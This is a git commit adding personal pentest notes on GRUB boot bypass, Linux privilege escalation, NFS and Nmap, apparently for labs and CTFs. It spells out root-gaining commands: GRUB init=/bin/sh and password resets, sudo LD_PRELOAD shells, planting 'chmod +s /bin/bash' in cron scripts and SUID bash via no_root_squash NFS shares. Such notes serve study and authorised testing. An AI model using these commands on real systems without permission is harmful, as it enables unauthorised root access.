new notes

Signed-off-by: Hadi <112569860+anotherhadi@users.noreply.github.com>
This commit is contained in:
Hadi
2026-06-03 23:39:40 +02:00
parent 15f2b6c184
commit 198112501a
10 changed files with 337 additions and 11 deletions
+67
View File
@@ -0,0 +1,67 @@
---
title: "GRUB Boot Bypass"
description: "Physical access techniques to get a root shell by editing GRUB boot parameters."
tags: ["linux", "grub", "physical-access", "privesc"]
publishDate: 2026-05-18
---
When GRUB is not password-protected, anyone with physical access can edit boot parameters and bypass authentication entirely.
At the GRUB menu, press **`e`** to edit the selected entry. Modify the line starting with `linux`, then press **`F10`** to boot.
## Techniques
### init=/bin/sh
Replaces the init process with a shell; drops directly into a root shell before any login prompt.
```
linux ... init=/bin/sh
```
Filesystem is mounted read-only by default. Remount to make changes:
```bash
mount -o remount,rw /
```
### init=/bin/bash
Same as above but uses bash. Add `rw` on the `linux` line to mount read-write from the start:
```
linux ... rw init=/bin/bash
```
### rd.break (systemd)
Interrupts the boot process in the initramfs, before the real root filesystem is mounted. Useful for resetting the root password.
```
linux ... rd.break
```
From the initramfs shell:
```bash
mount -o remount,rw /sysroot
chroot /sysroot
passwd root
exit
```
### single (single-user mode)
Boots into maintenance mode. On some distros this drops to a root shell without a password prompt (not Debian/Ubuntu).
```
linux ... single
```
### systemd.unit=rescue.target
systemd equivalent of single-user mode: minimal services, root shell.
```
linux ... systemd.unit=rescue.target
```
+80
View File
@@ -0,0 +1,80 @@
---
title: "Linux Privilege Escalation"
description: "Common misconfigurations and weaknesses to check when escalating privileges on Linux."
tags: ["linux", "privesc", "post-exploitation"]
publishDate: 2026-05-18
---
## Sudo
```bash
sudo -l
```
Check [GTFOBins](https://gtfobins.github.io) for any listed binary.
If `env_keep+=LD_PRELOAD` is set:
```bash
# compile a shared lib that spawns a shell
gcc -fPIC -shared -o /tmp/shell.so shell.c -nostartfiles
sudo LD_PRELOAD=/tmp/shell.so <allowed_binary>
```
## SUID / SGID
```bash
find / -user root -perm -4000 -ls 2>/dev/null # SUID
find / -group root -perm -2000 -ls 2>/dev/null # SGID
```
Check any non-standard binary on GTFOBins.
## Misconfiguration
```bash
# World-writable directories
find / -type d -perm -2 -ls 2>/dev/null
# World-writable files owned by root
find / -user root -perm -2 ! -type l -ls 2>/dev/null
```
## Cron Jobs
```bash
cat /etc/crontab
ls -la /etc/cron.*
crontab -l
```
If a cron runs a script you can write to, replace its content:
```bash
echo 'chmod +s /bin/bash' >> /path/to/script.sh
```
If the cron uses a relative PATH and a directory is writable, drop a malicious binary earlier in `$PATH`.
## Capabilities
```bash
getcap -r / 2>/dev/null
```
Dangerous capabilities: `cap_setuid`, `cap_net_raw`, `cap_dac_override`.
Check [GTFOBins](https://gtfobins.github.io) for exploitation.
## Kernel Exploits
```bash
uname -r
searchsploit linux kernel $(uname -r)
```
## LinPEAS / WinPEAS
Automated enumeration scripts to surface privesc vectors quickly.
- [LinPEAS (linux)](https://github.com/peass-ng/PEASS-ng/tree/master/linPEAS)
- [WinPEAS (windows)](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS)
-2
View File
@@ -5,8 +5,6 @@ tags: ["ftp", "network", "service"]
publishDate: 2026-04-29 publishDate: 2026-04-29
--- ---
## Overview
FTP runs on **port 21** (control) and uses a secondary data channel (port 20 for active, ephemeral port for passive). FTP runs on **port 21** (control) and uses a secondary data channel (port 20 for active, ephemeral port for passive).
Common implementations: vsftpd, ProFTPD, Pure-FTPd, FileZilla Server, IIS FTP. Common implementations: vsftpd, ProFTPD, Pure-FTPd, FileZilla Server, IIS FTP.
+79
View File
@@ -0,0 +1,79 @@
---
title: "NFS"
description: "Enumeration, mounting and privilege escalation techniques for NFS shares."
tags: ["nfs", "network", "service"]
publishDate: 2026-05-18
---
NFS (Network File System) runs on **port 2049** and allows remote filesystem mounting over the network.
Common on Linux/Unix environments. Access control is defined in `/etc/exports` on the server.
## Enumeration
### Nmap
```bash
nmap -sV -p 111,2049 $IP
nmap -p 111,2049 --script nfs-* $IP
```
Key scripts:
- `nfs-showmount`: lists exported shares
- `nfs-ls`: lists files in shares
- `nfs-statfs`: retrieves disk stats
### List shares
```bash
showmount -e $IP
rpcinfo -p $IP
```
## Mount
```bash
mkdir /mnt/nfs
mount -t nfs $IP:/share /mnt/nfs
mount -t nfs -o vers=2 $IP:/share /mnt/nfs # force NFSv2
umount /mnt/nfs
```
## Privilege Escalation
### no_root_squash
If the share is exported with `no_root_squash`, the remote root user keeps root privileges on the share.
Check `/etc/exports` on the server (if readable):
```bash
cat /etc/exports
```
Look for:
```
/share *(rw,no_root_squash)
```
If present, copy a SUID binary onto the share as root from your attacker machine:
```bash
cp /bin/bash /mnt/nfs/bash
chmod +s /mnt/nfs/bash
```
Then execute it on the target with `-p` to keep the SUID effective UID:
```bash
/tmp/nfs/bash -p
```
### UID spoofing
NFS authenticates by UID. If you know a file is owned by UID 1001 on the server, impersonate it directly:
```bash
python3 -c "import os; os.setuid(1001); os.system('/bin/bash')"
```
+108
View File
@@ -0,0 +1,108 @@
---
title: "Nmap"
description: "Host discovery, port scanning, service detection and NSE scripting"
tags: ["nmap", "network", "enumeration"]
publishDate: 2026-05-18
---
Nmap is a network scanner used for host discovery, port scanning, service/version detection, OS fingerprinting, and vulnerability scripting via NSE.
## Host Discovery
```bash
nmap -sn 192.168.1.0/24 # ping sweep, no port scan
nmap -sn -PR 192.168.1.0/24 # ARP ping (local network)
nmap -Pn $IP # skip host discovery, treat as up
```
## Port Scanning
```bash
nmap $IP # top 1000 ports (SYN scan if root)
nmap -p 80,443,8080 $IP # specific ports
nmap -p 1-65535 $IP # all ports
nmap -p- $IP # shorthand for all ports
nmap -sU $IP # UDP scan
nmap -sU -sS $IP # UDP + SYN together
```
Scan types:
- `-sS`: SYN scan (stealth, requires root)
- `-sT`: TCP connect scan (no root needed)
- `-sU`: UDP scan
- `-sA`: ACK scan (firewall rule mapping)
- `-sN/sF/sX`: Null, FIN, Xmas (evasion, unreliable on Windows)
## Service & Version Detection
```bash
nmap -sV $IP
nmap -sV --version-intensity 9 $IP # more aggressive probing
```
## OS Detection
```bash
nmap -O $IP
nmap -O --osscan-guess $IP # guess if not confident
```
## Aggressive Scan
```bash
nmap -A $IP # -sV -O --script=default --traceroute
```
## Timing Templates
```bash
nmap -T0 $IP # paranoid (IDS evasion, very slow)
nmap -T1 $IP # sneaky
nmap -T3 $IP # normal (default)
nmap -T4 $IP # aggressive (faster, good for CTFs)
nmap -T5 $IP # insane (may miss results)
```
## NSE Scripts
```bash
nmap --script default $IP
nmap --script vuln $IP
nmap --script "ftp-*" $IP
nmap --script safe $IP
nmap --script $script --script-args user=$user,pass=$password $IP
```
Common script categories: `auth`, `brute`, `default`, `discovery`, `dos`, `exploit`, `intrusive`, `safe`, `version`, `vuln`.
Scripts are located in `/usr/share/nmap/scripts/`.
## Output Formats
```bash
nmap -oN output.txt $IP # normal
nmap -oX output.xml $IP # XML
nmap -oG output.gnmap $IP # grepable
nmap -oA output $IP # all three at once
```
## Common Profiles
Quick full scan:
```bash
nmap -p- -T4 --min-rate 5000 -sV -sC -oA full $IP
```
CTF/lab initial recon:
```bash
nmap -sV -sC -p- --open $IP
```
UDP top ports:
```bash
nmap -sU --top-ports 100 $IP
```
-2
View File
@@ -5,8 +5,6 @@ tags: ["rdp", "network", "service"]
publishDate: 2026-05-04 publishDate: 2026-05-04
--- ---
## Overview
RDP (Remote Desktop Protocol) runs on **port 3389** and provides a graphical remote session. RDP (Remote Desktop Protocol) runs on **port 3389** and provides a graphical remote session.
Common on Windows servers and workstations. Common on Windows servers and workstations.
-2
View File
@@ -5,8 +5,6 @@ tags: ["ssh", "network", "service"]
publishDate: 2026-05-04 publishDate: 2026-05-04
--- ---
## Overview
SSH runs on **port 22** and provides an encrypted remote shell. SSH runs on **port 22** and provides an encrypted remote shell.
Common implementations: OpenSSH, Dropbear, Bitvise. Common implementations: OpenSSH, Dropbear, Bitvise.
-2
View File
@@ -5,8 +5,6 @@ tags: ["telnet", "network", "service"]
publishDate: 2026-05-04 publishDate: 2026-05-04
--- ---
## Overview
Telnet runs on **port 23** and transmits all data (including credentials) in **cleartext**. Telnet runs on **port 23** and transmits all data (including credentials) in **cleartext**.
Common on embedded devices, legacy systems, routers, and IoT equipment. Common on embedded devices, legacy systems, routers, and IoT equipment.
+1 -1
View File
@@ -32,7 +32,7 @@ If the page has been taken down or modified, the cached version may still show t
## Domain History ## Domain History
[VirusTotal](https://www.virustotal.com) shows the historical DNS records, subdomains, and associated IPs for any domain useful when a site has moved or been taken down. [VirusTotal](https://www.virustotal.com) shows the historical DNS records, subdomains, and associated IPs for any domaint useful when a site has moved or been taken down.
[ViewDNS.info](https://viewdns.info) covers WHOIS history, reverse IP, reverse MX, and port scans from a single interface. [ViewDNS.info](https://viewdns.info) covers WHOIS history, reverse IP, reverse MX, and port scans from a single interface.
+2 -2
View File
@@ -44,9 +44,9 @@ tweet_id = 1234567890123456789
timestamp_ms = (tweet_id >> 22) + 1288834974657 timestamp_ms = (tweet_id >> 22) + 1288834974657
``` ```
`1288834974657` is Twitter's custom epoch (Nov 4, 2010). Works on both tweet IDs and user IDs useful to confirm account creation date without needing profile metadata. `1288834974657` is Twitter's custom epoch (Nov 4, 2010). Works on both tweet IDs and user IDs: useful to confirm account creation date without needing profile metadata.
Several online converters exist if you don't want to do it manually search "snowflake id decoder". Several online converters exist if you don't want to do it manually: search "snowflake id decoder".
### Direct profile URL by ID ### Direct profile URL by ID